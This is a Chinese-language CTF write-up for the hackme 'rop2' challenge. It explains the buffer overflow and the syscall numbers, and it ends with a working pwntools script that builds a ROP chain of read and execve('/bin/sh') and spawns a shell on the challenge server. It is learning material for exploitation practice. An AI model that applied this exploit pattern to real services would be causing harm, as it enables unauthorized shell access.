hackme pwn rop2 [syscall + rop]

先checksec一下：

有个大概思路：rop过NX

main中和overflow函数里都有syscall函数，如下：

观察到这里有缓冲区溢出！"A" * 0xC！

先来学习syscall函数：

syscall(int arg1, ……)，为可变参数的函数，第一个参数为系统调用号，用以下命令查询：

cat -n /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep "__NR_"

     4	#define __NR_restart_syscall 0
     5	#define __NR_exit 1
     6	#define __NR_fork 2
     7	#define __NR_read 3
     8	#define __NR_write 4
     9	#define __NR_open 5
    10	#define __NR_close 6
    11	#define __NR_waitpid 7
    12	#define __NR_creat 8
    13	#define __NR_link 9
    14	#define __NR_unlink 10
    15	#define __NR_execve 11
    16	#define __NR_chdir 12
    17	#define __NR_time 13
……

拿__NR_read 3举例，表示ID = 3时，调用的是read函数

SYSCALL_DEFINE3(read, unsigned int fd, char* buf, size_t count)

fd为系统描述符，fd=0时表示标准输入，从键盘输入读取，buf为缓冲区，count为长度

拿__NR_write 4举例，表示ID = 4时，调用的是write函数（和read类似）

_syscall3(int write,int fd,const char * buf,off_t count)

我们看到，execve函数的ID为11，当执行execve(“/bin//sh”,NULL,NULL)即成功。

所以，我们的目标是：

（1）将"/bin/sh"写入

（2）利用syscall，调用ID=11的execve

所以gadgets链表为：syscall(3, bss, 0, 8) - syscall(11, bss, 0, 0)，然后在输入"/bin/sh"

细节1：

找gadgets是在函数__libc_csu_init中，需要几个参数就从第几个开始

细节2：

当发现程序没有开启PIE时，需要哪些地址的值，都是可以在IDA中扣出来这些地址滴

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./rop2")
io = remote("hackme.inndy.tw", 7703)

p4r = 0x08048578
syscall_addr = 0x08048320
bss_addr = 0x0804A020

#elf = ELF("./rop2")
#syscall_addr = elf.symbols["syscall"]
#bss_addr = elf.bss()

io.recvuntil("ropchain:")
payload = "A" * 0xC + "B" * 4
payload += p32(syscall_addr) + p32(p4r) + p32(3) + p32(0) + p32(bss_addr) + p32(8)
payload += p32(syscall_addr) + p32(0xABCD) + p32(11) + p32(bss_addr) + p32(0) + p32(0)

#payload = fit({0xC+0x4: [p32(syscall_addr), p32(p4r), p32(3), p32(0), p32(bss_addr), p32(8)]})
#payload += fit({0x0, [p32(syscall_addr), p32(0xABCD), p32(11), p32(bss_addr), p32(0), p32(0)]})

io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()